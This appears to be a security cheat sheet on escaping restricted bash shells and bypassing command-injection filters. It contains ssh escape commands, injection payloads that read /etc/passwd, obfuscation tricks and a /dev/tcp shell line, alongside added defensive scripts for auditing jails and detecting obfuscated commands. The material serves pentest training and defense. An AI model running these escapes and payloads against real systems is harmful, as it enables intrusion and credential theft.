Restricted shells
Bypass restricted shells
Example for restricted shell
root@Desktop: ~ #ssh -6 user@fe80::XXXXX:2c74%wlan0
user@fe80::XXXXX:2c74%wlan0 's password:
Welcome to Ubuntu 16.04.5 LTS (GNU/Linux 4.15.0-34-generic x86_64)
Documentation: https://help.ubuntu.com
Management: https://landscape.canonical.com
Support: https://ubuntu.com/advantage
Last login: Fri Jul 12 14:15:45 2019 from fe80::XXXXX:2c74%wlan0
jail@HOST:~$ -rbash: /dev/null: restricted: cannot redirect output
bash: _upvars: -a0': invalid number specifier
-rbash: /dev/null: restricted: cannot redirect output
bash: _upvars: -a0': invalid number specifier
-rbash: /dev/null: restricted: cannot redirect output
bash: _upvars: -a0': invalid number specifier
-rbash: /dev/null: restricted: cannot redirect output
bash: _upvars: -a0': invalid number specifier
user@HOST:~$ vim
-rbash: /usr/lib/command-not-found: restricted: cannot specify /' in command names
jail@HOST:~$ exit
logout
-rbash: /usr/bin/clear_console: restricted: cannot specify /' in command names
Connection to fe80::XXXXX:2c74%wlan0 closed.
First:
Check 'echo $PATH'
List which commands are in the $PATH directory (ls -l /home/student/.bin)
Fix the path: export PATH=/bin:/usr/bin
Enumeration
Linux environment enumeration is the most important part. We need to enumerate the Linux environment to check what we can do to bypass rbash.
We need to enumerate:
First we must check for available commands like cd/ls/echo etc.
We must check for operators like >, >>, <, |.
We need to check for available programming languages like perl, ruby, python etc.
Which commands we can run as root (sudo -l).
Check for files or commands with the SUID permission.
Check which shell you are in: echo $SHELL (you will be in rbash 90% of the time).
Check the environment variables: run env or printenv.
Now let's move on to common exploitation techniques.
Practice
Practice restricted shell escape: https://www.root-me.org/en/Challenges/App-Script/Bash-Restricted-shells
SSH
ssh user@HOST -t bash
Or
ssh user@HOST -t /bin/bash
Or
ssh user@HOST -t "bash --noprofile"
Add Path
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
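The PATH checks at the top of these notes and the enumeration list are what a jailed user does from the inside; the script below is the administrator-side counterpart, added here as an example and not part of the original notes. It audits a jail for the same three weaknesses: a PATH directory the jailed user can write to (so they can drop in their own ls), a shell, editor or interpreter reachable from PATH directly or through a symlink under another name, and a writable start-up file, which matters because rbash enforces its restrictions only after ~/.bashrc and friends have been read. The user name jail, the directory layout built with mktemp and the ESCAPE_BINS list are assumptions of this example.

```shell
#!/bin/sh
# Added example, not part of the original notes: administrator-side audit of
# an rbash jail. Findings correspond to what the in-jail checks above look for:
#   1. a PATH directory the jailed user can write to,
#   2. an escape-capable program reachable from PATH (also via symlink),
#   3. a writable start-up file (rbash restricts PATH/SHELL only after they run).
# "jail", the jail layout and ESCAPE_BINS are assumptions of this example.

# Shells plus the editors/interpreters this page mentions; padded with spaces
# so a whole-word match is a simple case pattern.
ESCAPE_BINS=" bash sh dash zsh ksh vi vim nano python python3 perl ruby "

# writable_by USER FILE -> true if USER owns FILE or FILE is world-writable
writable_by() {
  owner=$(ls -ld "$2" | awk '{print $3}')
  [ "$owner" = "$1" ] && return 0
  [ -n "$(find "$2" -prune -perm -002 2>/dev/null)" ]
}

# audit_jail USER HOME JAIL_PATH -> prints one finding per line, true if none
audit_jail() {
  aj_user=$1 aj_home=$2 findings=0
  old_ifs=$IFS; IFS=:; set -- $3; IFS=$old_ifs   # split the PATH on ':'
  for dir in "$@"; do
    if [ ! -d "$dir" ]; then
      echo "PATH entry does not exist: $dir"; findings=$((findings + 1)); continue
    fi
    if writable_by "$aj_user" "$dir"; then
      echo "PATH directory writable by $aj_user: $dir"; findings=$((findings + 1))
    fi
    for f in "$dir"/*; do
      [ -e "$f" ] || [ -L "$f" ] || continue      # empty dir or dangling link
      name=$(basename "$f"); target=$name
      [ -L "$f" ] && target=$(basename "$(readlink "$f")")
      case "$ESCAPE_BINS" in
        *" $name "* | *" $target "*)
          echo "escape-capable program in PATH: $f -> $target"
          findings=$((findings + 1)) ;;
      esac
    done
  done
  for rc in .bashrc .bash_profile .bash_login .profile; do
    [ -e "$aj_home/$rc" ] || continue
    if writable_by "$aj_user" "$aj_home/$rc"; then
      echo "start-up file writable by $aj_user: $aj_home/$rc"; findings=$((findings + 1))
    fi
  done
  [ "$findings" -eq 0 ]
}

# count_findings USER HOME JAIL_PATH -> number of findings (0 for a clean jail)
count_findings() { audit_jail "$1" "$2" "$3" | grep -c .; }

# build_sample_jail weak|hardened -> path of a constructed jail home under mktemp
build_sample_jail() {
  jail_home=$(mktemp -d)
  mkdir "$jail_home/bin"
  ln -s /bin/ls "$jail_home/bin/ls"                 # an allowed command, linked in
  printf 'PATH=%s/bin\nexport PATH\n' "$jail_home" > "$jail_home/.bashrc"
  if [ "$1" = weak ]; then
    chmod 777 "$jail_home/bin"                       # user can add binaries to PATH
    ln -s /usr/bin/vim "$jail_home/bin/view"         # editor reachable under another name
    chmod 666 "$jail_home/.bashrc"                   # user can undo the PATH lock
  else
    chmod 755 "$jail_home/bin"
    chmod 644 "$jail_home/.bashrc"
  fi
  echo "$jail_home"
}

# Demonstration on the constructed weak jail: three findings are printed.
demo=$(build_sample_jail weak)
audit_jail jail "$demo" "$demo/bin" || echo "-> $demo is not a safe jail"
rm -rf "$demo"
```

Against a real jail run `audit_jail jail /home/jail /home/jail/bin` with the user's actual login PATH. Note what the audit cannot see: the ssh -t entries above run the login shell as `rbash -c bash`, where the PATH in effect comes from sshd's defaults rather than the user's .bashrc, so closing that route is an sshd configuration matter (ForceCommand in a Match User block), not a filesystem one.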
Chaining commands
original_cmd_by_server; ls
original_cmd_by_server && ls
original_cmd_by_server | ls
original_cmd_by_server || ls   # runs ls only if the first command fails
Inside a command
original_cmd_by_server `cat /etc/passwd`
original_cmd_by_server $(cat /etc/passwd)
Filter Bypasses
Bypass without space
Works on Linux only.
cat</etc/passwd
{cat,/etc/passwd}
cat$IFS/etc/passwd
echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd
X=$'uname\x20-a'&&$X
sh</dev/tcp/127.0.0.1/4242
Command execution without spaces, $ or { } - Linux (bash only)
IFS=,;`cat<<<uname,-a`
Works on Windows only.
ping%CommonProgramFiles:~10,-18%IP
ping%PROGRAMFILES:~10,-5%IP
Bypass with a line return
something%0Acat%20/etc/passwd
Bypass Blacklisted words
Bypass with single quote
w'h'o'am'i
Bypass with double quote
w"h"o"am"i
Bypass with backslash and slash
w\ho\am\i
/\b\i\n/////s\h
Bypass with $@
who$@ami
echo $0
-> /usr/bin/zsh
echo whoami|$0
Bypass with variable expansion
/???/??t /???/p??s??
test=/ehhh/hmtc/pahhh/hmsswd
cat ${test//hhh\/hm/}
cat ${test//hh??hm/}
Bypass with wildcards
powershell C:\*\*2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:\*\*32\c*?c.e?e # calc
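The common thread of the filter bypasses above is that a blacklist applied to the raw string never sees the word it is looking for. The detection-side answer, added here as an example and not part of the original notes, is to normalize the command line first: strip the quote, backslash, $@, IFS, brace-group and repeated-slash tricks listed for bash, then match. Two of the forms above cannot be undone by string rewriting, the ? globs and ${var/pattern/} substitutions, because they only resolve when the shell executes them; the script flags their shape instead and leaves the resolved argv to execve auditing. The sample log lines are constructed from the entries on this page, not real captures, and the keyword list is an assumption.

```shell
#!/bin/sh
# Added example, not part of the original notes: normalize obfuscated bash
# command lines before keyword matching, and flag the forms that cannot be
# normalized. Sample lines are constructed; the keyword list is an assumption.

# normalize_cmd: stdin -> stdout. Quotes and backslashes go first, whitespace
# substitutes and brace groups after, so w'h'o'am'i, who$@ami, cat${IFS}/etc/passwd,
# {cat,/etc/passwd} and /\b\i\n/////s\h all come out as plain words.
normalize_cmd() {
  sed -e "s/'//g" \
      -e 's/"//g' \
      -e 's/\\//g' \
      -e 's/\$@//g' \
      -e 's/\${IFS}/ /g' \
      -e 's/\$IFS/ /g' \
      -e 's/{\([^,}]*\),\([^}]*\)}/\1 \2/g' \
      -e 's/\/\/*/\//g'
}

# classify_cmd CMDLINE -> "ALERT|keyword|<norm>", "ALERT|obfuscation|<norm>" or "ok|-|<norm>"
classify_cmd() {
  norm=$(printf '%s\n' "$1" | normalize_cmd)
  if printf '%s\n' "$norm" | grep -Eq 'whoami|/etc/passwd|/bin/sh|/dev/tcp/'; then
    printf 'ALERT|keyword|%s\n' "$norm"
  elif printf '%s\n' "$norm" | grep -Eq '\?\?|\$\{[A-Za-z_]+/'; then
    # /???/??t and ${test//hhh/hm/} resolve only at execution time; a string
    # filter cannot recover them, so flag the shape and rely on execve logging.
    printf 'ALERT|obfuscation|%s\n' "$norm"
  else
    printf 'ok|-|%s\n' "$norm"
  fi
}

# count_alerts: command lines on stdin -> number of lines classified ALERT
count_alerts() {
  n=0
  while IFS= read -r line; do
    case "$(classify_cmd "$line")" in ALERT*) n=$((n + 1)) ;; esac
  done
  echo "$n"
}

# Constructed sample of shell-history style lines using the forms on this page.
sample_log() {
  cat <<'EOF'
ls -l /home/student/.bin
w'h'o'am'i
w"h"o"am"i
w\ho\am\i
who$@ami
cat${IFS}/etc/passwd
{cat,/etc/passwd}
/\b\i\n/////s\h
/???/??t /???/p??s??
cat ${test//hhh\/hm/}
echo $PATH
EOF
}

# Demonstration: 9 of the 11 constructed lines are flagged.
sample_log | while IFS= read -r line; do classify_cmd "$line"; done
```

The brace rule only handles two-element groups and the slash rule collapses the `//` of `${var//pat/rep}` to a single `/`, which is why the obfuscation pattern matches on one slash. A normalizer like this belongs in front of the matcher, never as a replacement for logging the executed argv.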